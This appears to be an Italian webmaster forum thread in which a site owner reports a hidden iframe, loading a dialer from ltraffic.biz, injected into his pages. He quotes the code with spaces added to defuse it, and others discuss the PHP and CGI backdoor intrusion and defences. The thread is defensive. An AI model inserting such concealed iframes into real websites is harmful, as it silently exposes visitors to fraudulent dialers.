LTraffic.biz

[Goldrakkio]

Ieri su tutti i miei siti è comparso questo codice.

<i f r a m e s r c ="h t t p :/ / ltraffic.biz/resource.php?id=4127&user=f1rebl00d" width=1 height=1 style="display:none" > < / i f r a m e >

(ho messo io gli spazi nel codice per non fare partire il dialer su alverde...)

Penso che il webmaster con id4127 user firebl00d abbia bucato il server dove sono i miei siti ed aggiunto il suo codice

QUalcuno conosce questa società ltraffic.biz?
Come mi devo comportare, segnalo tutto alla società e lo bannano?


http://www.urlare.it

[paolinox]

russi....mi sa che sono stati proprio loro, visto che la società si occupa di scambio visite e non di dialer.....

ti avranno bucato loro....

p.s. mica hai i server in Estonia?


Giochi online in Flash & Shockwave

[Act4rus]

è possibile che tu abbia dei codici javascript per invocare lo scambio banner?
se è così è molto propabile che non ti hanno bucato il server ma hanno semplicemente cambiato invocazione di pagina e adesso ti ritrovi dei dialer.
cmq se vuoi fare un test (se il server è tuo) entra in remoto vai nella cartella dove si trova una di queste pagine modificate, fai tasto dx --> proprietà e vedi la data dell'ultima modifica, se riscontri che in quella data tu non hai apportato modifiche allora è propabile che ti abbiano bucato.

[Goldrakkio]

Non ho il server in Estonia
cmq ho parlato con il provider e mi ha detto che non hanno bucato il server ma probabilmente sono riusciti ad entrare solo sui miei siti...
Che faccio li segnalo alla società?



http://www.urlare.it

[StellaMania]

Segnalalo alla società perchè sono gli stessi che hanno cercato di entrare nei nostri servers di advmania qualche giorno fa!


Supporto online: www.advmania.com Pubblicità sul tuo sito
Pay per Click
Pay per Click-in (blindlink)
Pay per Redirect
Pay per Slide

[Act4rus]

beh mi auguro che la società sia estranea a queste cose, anche se ne dubito fortemente.
io direi di togliere gli script di scambio banner che hai

[oziofester]

Citazione:

quote:Originally posted by StellaMania

Segnalalo alla società perchè sono gli stessi che hanno cercato di entrare nei nostri servers di advmania qualche giorno fa!

Come? Da che parte? Applicazioni web open source, ssh, bind, apache?
Grazie ciao.


Ozio Fester

[StellaMania]

Entrano tramite php script, ti inseriscono un iframe con l'url (ltraffic.biz/resource.php?id=4127&user=f1rebl00d) e ti lasciano sul server un cgi per dargli modo di accedere allo script quando vogliono. Ti consiglio di controllare tutti i files che hai nel server, di installare software anti intrusione e di bloccare l'accesso ftp.
Non credo che ltraffic.biz sia consapevole quindi potresti provare a contattarli sul loro icq: 266371367 per far bannare id4127 user firebl00d, cmq appena mi aggiungono su icq ci parlo anche io..

[malamessomal]

Pulite gli input provenienti dall'esterno ?
nel 99% dei casi basta uno strip_tags() e un substr per bloccare un attacco ad uno script php

ps. i cgi spesso non vengono usati, se è il vostro caso disabilitateli


Cazzate Barzellette Satira e Umorismo - join the fun

[Goldrakkio]

Premesso che non capisco niente di php cgi ecc ecc.,
il server sul quale sono i miei siti non è apache ma un IIS con asp e non php
inoltre nelle pagine non ci sono scambi banner in php
cmq il problema SEMBRA risolto, non mi resta che segnalare il fatto alla società ltraffic.biz, anche se non so con quali effetti...
saluti e grazie.
Max


http://www.urlare.it